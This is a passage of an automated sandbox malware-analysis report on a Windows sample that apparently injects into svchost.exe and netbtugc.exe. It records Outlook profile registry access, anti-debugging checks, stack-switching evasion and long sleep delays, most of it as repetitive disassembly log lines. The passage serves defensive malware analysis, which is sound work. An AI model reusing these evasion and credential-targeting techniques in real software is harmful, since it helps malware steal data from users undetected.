            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 8htbxM8GPX.exeStatic file information: File size 1244672 > 1048576
            Source: 8htbxM8GPX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 8htbxM8GPX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 8htbxM8GPX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 8htbxM8GPX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 8htbxM8GPX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 8htbxM8GPX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 8htbxM8GPX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XWXkhXRHcDkPdE.exe, 00000005.00000000.1937047928.00000000002DE000.00000002.00000001.01000000.00000005.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000000.2084677032.00000000002DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2014186824.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919454777.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1921246869.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4191758383.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2013356059.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2018934901.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4191758383.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2014186824.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919454777.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1921246869.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4191758383.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2013356059.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2018934901.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4191758383.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1982197779.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2013903971.0000000003400000.00000004.00000020.00020000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000005.00000003.1952930659.0000000000A5B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4190676989.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4192324042.000000000340C000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000000.2085236634.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2311200838.0000000005A2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4190676989.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4192324042.000000000340C000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000000.2085236634.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2311200838.0000000005A2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1982197779.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2013903971.0000000003400000.00000004.00000020.00020000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000005.00000003.1952930659.0000000000A5B000.00000004.00000001.00020000.00000000.sdmp
            Source: 8htbxM8GPX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 8htbxM8GPX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 8htbxM8GPX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 8htbxM8GPX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 8htbxM8GPX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004048A9 push esp; ret 1_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E2BA push 00000038h; iretd 1_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A436 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418C92 pushad ; retf 1_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A5D9 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004017E5 push ebp; retf 003Fh1_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403780 push eax; ret 1_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004147A2 push es; iretd 1_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A309AD push ecx; mov dword ptr [esp], ecx1_2_03A309B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E109AD push ecx; mov dword ptr [esp], ecx6_2_02E109B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00430CE1 pushfd ; retf 6_2_00430D0B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00411126 push esp; ret 6_2_00411127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0042D1B0 push es; ret 6_2_0042D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00422238 pushad ; iretd 6_2_00422239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0042550F pushad ; retf 6_2_00425510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0042AB37 push 00000038h; iretd 6_2_0042AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00426CB3 push ebx; iretd 6_2_00426E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00426E56 push ebx; iretd 6_2_00426E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0042FEF5 push FFFFFFBAh; ret 6_2_0042FEF7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0041FFA0 push esi; iretd 6_2_0041FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C2429A push cs; retf 6_2_02C242F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C24268 push cs; retf 6_2_02C242F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C203DA push ebx; ret 6_2_02C2042C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C2D620 push esi; ret 6_2_02C2D63B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C247F5 push es; ret 6_2_02C247FA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C2344F push cs; ret 6_2_02C23450
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C29DFF pushad ; retf 6_2_02C29E00
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059D1D90 push eax; retf 7_2_059D1D8F
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059DCDD5 push esi; iretd 7_2_059DCDDA
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059ECD2A push FFFFFFBAh; ret 7_2_059ECD2C
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059D1D43 push eax; retf 7_2_059D1D8F
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeAPI/Special instruction interceptor: Address: 983244
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAD1C0 rdtsc 1_2_03AAD1C0
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9745Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7964Thread sleep count: 228 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7964Thread sleep time: -456000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7964Thread sleep count: 9745 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7964Thread sleep time: -19490000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe TID: 7984Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe TID: 7984Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe TID: 7984Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0042BAB0 FindFirstFileW,FindNextFileW,FindClose,6_2_0042BAB0
            Source: netbtugc.exe, 00000006.00000002.4190676989.00000000028BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
            Source: XWXkhXRHcDkPdE.exe, 00000007.00000002.4190966357.00000000014AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: firefox.exe, 00000008.00000002.2312777041.000001510595B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAD1C0 rdtsc 1_2_03AAD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417823 LdrLoadDll,1_2_00417823
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A533A5 mov eax, dword ptr fs:[00000030h]1_2_03A533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A633A0 mov eax, dword ptr fs:[00000030h]1_2_03A633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A633A0 mov eax, dword ptr fs:[00000030h]1_2_03A633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]1_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]1_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0539D mov eax, dword ptr fs:[00000030h]1_2_03B0539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A8739A mov eax, dword ptr fs:[00000030h]1_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A8739A mov eax, dword ptr fs:[00000030h]1_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF3E6 mov eax, dword ptr fs:[00000030h]1_2_03AEF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B053FC mov eax, dword ptr fs:[00000030h]1_2_03B053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A663FF mov eax, dword ptr fs:[00000030h]1_2_03A663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC3CD mov eax, dword ptr fs:[00000030h]1_2_03AEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEB3D0 mov ecx, dword ptr fs:[00000030h]1_2_03AEB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF132D mov eax, dword ptr fs:[00000030h]1_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF132D mov eax, dword ptr fs:[00000030h]1_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5F32A mov eax, dword ptr fs:[00000030h]1_2_03A5F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A27330 mov eax, dword ptr fs:[00000030h]1_2_03A27330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB930B mov eax, dword ptr fs:[00000030h]1_2_03AB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB930B mov eax, dword ptr fs:[00000030h]1_2_03AB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB930B mov eax, dword ptr fs:[00000030h]1_2_03AB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C310 mov ecx, dword ptr fs:[00000030h]1_2_03A2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50310 mov ecx, dword ptr fs:[00000030h]1_2_03A50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF367 mov eax, dword ptr fs:[00000030h]1_2_03AEF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD437C mov eax, dword ptr fs:[00000030h]1_2_03AD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A37370 mov eax, dword ptr fs:[00000030h]1_2_03A37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A37370 mov eax, dword ptr fs:[00000030h]1_2_03A37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A37370 mov eax, dword ptr fs:[00000030h]1_2_03A37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2D34C mov eax, dword ptr fs:[00000030h]1_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2D34C mov eax, dword ptr fs:[00000030h]1_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B05341 mov eax, dword ptr fs:[00000030h]1_2_03B05341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29353 mov eax, dword ptr fs:[00000030h]1_2_03A29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29353 mov eax, dword ptr fs:[00000030h]1_2_03A29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov ecx, dword ptr fs:[00000030h]1_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA352 mov eax, dword ptr fs:[00000030h]1_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]1_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]1_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A452A0 mov eax, dword ptr fs:[00000030h]1_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A452A0 mov eax, dword ptr fs:[00000030h]1_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A452A0 mov eax, dword ptr fs:[00000030h]1_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A452A0 mov eax, dword ptr fs:[00000030h]1_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF92A6 mov eax, dword ptr fs:[00000030h]1_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF92A6 mov eax, dword ptr fs:[00000030h]1_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF92A6 mov eax, dword ptr fs:[00000030h]1_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF92A6 mov eax, dword ptr fs:[00000030h]1_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC72A0 mov eax, dword ptr fs:[00000030h]1_2_03AC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC72A0 mov eax, dword ptr fs:[00000030h]1_2_03AC72A0
